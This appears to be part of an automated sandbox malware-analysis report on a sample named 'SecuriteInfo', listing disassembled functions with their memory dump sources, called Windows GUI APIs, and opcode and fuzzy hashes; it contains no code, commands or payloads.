                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$EnableParentShow
                                                                            • String ID:
                                                                            • API String ID: 2218845466-0
                                                                            • Opcode ID: d592f1c88c8697309c3406359ac7f55d03cc8bd29840def5e1e1ec0ba4ba66e4
                                                                            • Instruction ID: 2671f4abab107e4af8f4094310b4ab6f4f843b5c13719ccaba15cb9bd3ef6a00
                                                                            • Opcode Fuzzy Hash: d592f1c88c8697309c3406359ac7f55d03cc8bd29840def5e1e1ec0ba4ba66e4
                                                                            • Instruction Fuzzy Hash: C5515E35300B8081EA26EB67ED553EE6351AB8DFD4F484526EF0E5BBA6DE38C5018740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017C090 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$FillInflate
                                                                            • String ID:
                                                                            • API String ID: 3595577067-0
                                                                            • Opcode ID: fb4dbf69e51abe2309d8b5d2a6c2cc96a80e073410e6116de427fbc6feeb9275
                                                                            • Instruction ID: 05bd00f36b66b679791e02fdad2a52eeace0706c788e3695dbc4b99402f621b4
                                                                            • Opcode Fuzzy Hash: fb4dbf69e51abe2309d8b5d2a6c2cc96a80e073410e6116de427fbc6feeb9275
                                                                            • Instruction Fuzzy Hash: D651AD36B10A9485EB12DBABE844BEC2770B78DF98F498226DF4957BA5DF38C441C344
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014007A890 Relevance: 6.1, APIs: 4, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageRectSend$EmptyWindow
                                                                            • String ID:
                                                                            • API String ID: 1914275016-0
                                                                            • Opcode ID: 176ede9921599cf35cbb2112d4154dda553f79c8eae67f32a20a77a54d25ba44
                                                                            • Instruction ID: f73993f75fc4eb559c0014eecca52b2f708491646465de5a1cd0345535f0712b
                                                                            • Opcode Fuzzy Hash: 176ede9921599cf35cbb2112d4154dda553f79c8eae67f32a20a77a54d25ba44
                                                                            • Instruction Fuzzy Hash: 43514B36314A9582EE65DB67E854BEA27A0BB8DFD4F085022DF4A47BA1DF3CC541C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016DFE4 Relevance: 6.1, APIs: 4, Instructions: 137windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$BeepExceptionInvalidateMenuRectSendThrow
                                                                            • String ID:
                                                                            • API String ID: 2854889734-0
                                                                            • Opcode ID: c0a64e3e9150b8457a842b3030b2ca6f7d84fd370d8a71af57c5640927c81ddf
                                                                            • Instruction ID: 9dcd9acc1ae9dfdcd94a1bd97702941cde240a26693b1a6cd7fa42df3741897b
                                                                            • Opcode Fuzzy Hash: c0a64e3e9150b8457a842b3030b2ca6f7d84fd370d8a71af57c5640927c81ddf
                                                                            • Instruction Fuzzy Hash: 81513A36310A8086EA159B67D9547ED2761F78EFD4F084626EF1E47BA5CE78C502C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140102278 Relevance: 6.1, APIs: 4, Instructions: 136windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$AppendCheckCreateItemPopupWindow
                                                                            • String ID:
                                                                            • API String ID: 2012662573-0
                                                                            • Opcode ID: dbfd0b51509c1cf65ac70757294c97ab39dd938935b445158a21446ff826ee22
                                                                            • Instruction ID: 6032ea44519de0f22549a69a883dff2b657a8a75667e630b7fbdfc451fe0c93a
                                                                            • Opcode Fuzzy Hash: dbfd0b51509c1cf65ac70757294c97ab39dd938935b445158a21446ff826ee22
                                                                            • Instruction Fuzzy Hash: D0516C75314A5082EA16DB67E84479A63A0BB8DFE0F144226EF9D87BF5DF39C842C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400AA1E8 Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$EnableImageInvalidateItemKillLoadObjectRectSystemTimerUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 4017357474-0
                                                                            • Opcode ID: 0a9a3eff43ca2f516c5a2e396a629264a65d0d39f2fdcd8e8777b9c66744e936
                                                                            • Instruction ID: 8574dd7e7bf90e3101531c7fc6fdbcfd1cdab8208aec4f1728dd91bb0e429bbc
                                                                            • Opcode Fuzzy Hash: 0a9a3eff43ca2f516c5a2e396a629264a65d0d39f2fdcd8e8777b9c66744e936
                                                                            • Instruction Fuzzy Hash: A951AC32A0468086FB56DF26E4583EA77A1F79DB95F084229FB09076E5CB3CC891CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140088094 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ConditionMaskOffset$ColorFillInfoMetricsSystemTextVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 1863428763-0
                                                                            • Opcode ID: 3f52b638578673f4b041bb64a9908f3f6d48c1bc98e78f150d5b645b395d3fee
                                                                            • Instruction ID: a13038c68f2359fd536c6039486fbefe888e1fd867519d41b8f7b42e6167958d
                                                                            • Opcode Fuzzy Hash: 3f52b638578673f4b041bb64a9908f3f6d48c1bc98e78f150d5b645b395d3fee
                                                                            • Instruction Fuzzy Hash: 9551A335A54A408AFA229F43A818BD97765B79DBE5F40012AEF0917BF0DF7CC941CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014000C5C0 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                            • String ID:
                                                                            • API String ID: 3936042273-0
                                                                            • Opcode ID: 0c452a45520bb3bb1e55c69d1a415456e02cfee26cd9e8a547460aadb415ff02
                                                                            • Instruction ID: 2c5424fd93f27173ea38a3c50e26712a84f10bbaa6757268fc945ad814a886ef
                                                                            • Opcode Fuzzy Hash: 0c452a45520bb3bb1e55c69d1a415456e02cfee26cd9e8a547460aadb415ff02
                                                                            • Instruction Fuzzy Hash: 2F41B072326B8485FE2AEB67B4147ED2291A708FE0F640521AF6D077E6DB78C4928304
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140074230 Relevance: 6.1, APIs: 4, Instructions: 124windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleConditionCreateHashMask$BitmapClientImplImpl::InfoMetricsRectSystemVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 2548309268-0
                                                                            • Opcode ID: 82c27359a8ee893a8ec603a520ff70351629309f6643435b7e2d2c9ef6664bf3
                                                                            • Instruction ID: cbd7d2a568dc102b2383f7adcc2a955cc0c66a2069210fc3c35a78d4704e1f94
                                                                            • Opcode Fuzzy Hash: 82c27359a8ee893a8ec603a520ff70351629309f6643435b7e2d2c9ef6664bf3
                                                                            • Instruction Fuzzy Hash: E551783A600B4096EB22DB13E844BDAB3A4F788BD4F458225AF9D477B0DF78C941C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400BE0FC Relevance: 6.1, APIs: 4, Instructions: 122windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ContextExternal$BaseBase::~Concurrency::details::DestroyMenuMessageParentSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3377428259-0
                                                                            • Opcode ID: e4f421f3e79e49b9cc329e02afb8855fd147e268266daeed115d49ad3933ad66
                                                                            • Instruction ID: d962a2f2363353030750f178abb242cf5ce70a04505abfd0961c9ed8a4cbc686
                                                                            • Opcode Fuzzy Hash: e4f421f3e79e49b9cc329e02afb8855fd147e268266daeed115d49ad3933ad66
                                                                            • Instruction Fuzzy Hash: C5513E36206B8092EB16DF6AE4907DD7364F78ABA0F595222DBAA437F5CF38C541C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140048334 Relevance: 6.1, APIs: 4, Instructions: 120windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EnableFocusItemMenuMessageParentSend
                                                                            • String ID:
                                                                            • API String ID: 2297321873-0
                                                                            • Opcode ID: ec3ab5d7eddb47a3bfcee46bf8643b14647963ba0ec1eaf43b0390d819b84c06
                                                                            • Instruction ID: 9b9bf5d4e62fd6906cb759be4199f812e73c27ef47e0bb0297ea3ccd709b95ea
                                                                            • Opcode Fuzzy Hash: ec3ab5d7eddb47a3bfcee46bf8643b14647963ba0ec1eaf43b0390d819b84c06
                                                                            • Instruction Fuzzy Hash: 0E418736610A8582EB26EF17E4443AE6360F788FD4F254621EF4947BA5CF78C882C748
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140060618 Relevance: 6.1, APIs: 4, Instructions: 113windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 3204612718-0
                                                                            • Opcode ID: eb4f13a8cc8d87589b06f2f5028dbcf122fb1d8d6ffd416161425efe21cb9069
                                                                            • Instruction ID: 30a530776736487b1b6cb2d7495a57dd06332d1767159d6a2ec092dd10bdeaca
                                                                            • Opcode Fuzzy Hash: eb4f13a8cc8d87589b06f2f5028dbcf122fb1d8d6ffd416161425efe21cb9069
                                                                            • Instruction Fuzzy Hash: A941AF32315A8492E612AB27E8547EF6351FBC97E4F540625BBAE477E6EE78C4018B00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014006674C Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRectRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 1437620686-0
                                                                            • Opcode ID: aa3b6faf84aaa753399250a42ad664628a40eae6b75006fc2550d449fe025e34
                                                                            • Instruction ID: 76d3c56bf9cb744e4cde3e6f0184510c0e4f31488f664b6d9d267d4982c57f45
                                                                            • Opcode Fuzzy Hash: aa3b6faf84aaa753399250a42ad664628a40eae6b75006fc2550d449fe025e34
                                                                            • Instruction Fuzzy Hash: 8641DD32704A808AEB25CB36D950BEE63A2F78CB84F244624EF4D47B65DF38E4518F00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140114724 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DeferRect$BeginClient
                                                                            • String ID:
                                                                            • API String ID: 3800593763-0
                                                                            • Opcode ID: 62a01d58e439226be9bbd1009cc8fec2fb16f01d077a59a13304d29bfaf7f516
                                                                            • Instruction ID: 57581e6e8f68eecfd72a030638c2a0ffe541ad9b32e3e8f402d6491087e163dc
                                                                            • Opcode Fuzzy Hash: 62a01d58e439226be9bbd1009cc8fec2fb16f01d077a59a13304d29bfaf7f516
                                                                            • Instruction Fuzzy Hash: AC414733620A809EE721DF3AD484BDD77A1F78CB98F444216AB4857A58DF38D695CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014015E4D8 Relevance: 6.1, APIs: 4, Instructions: 86windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Windowstd::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3123351323-0
                                                                            • Opcode ID: 7bc46f943ad044217d694abb6694cd8a051b5b92afedbd71f59823a43b5bf2ff
                                                                            • Instruction ID: 6994de1d11bf44b854a6a20a6e0f162e2116b226e822cb20abed6f6f0baaa3cb
                                                                            • Opcode Fuzzy Hash: 7bc46f943ad044217d694abb6694cd8a051b5b92afedbd71f59823a43b5bf2ff
                                                                            • Instruction Fuzzy Hash: 7C315D36620A4082EA26AB27E4947DA67A1AB8DFC4F5C4521EB5D4B7F5FE39C401C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014004E4BC Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
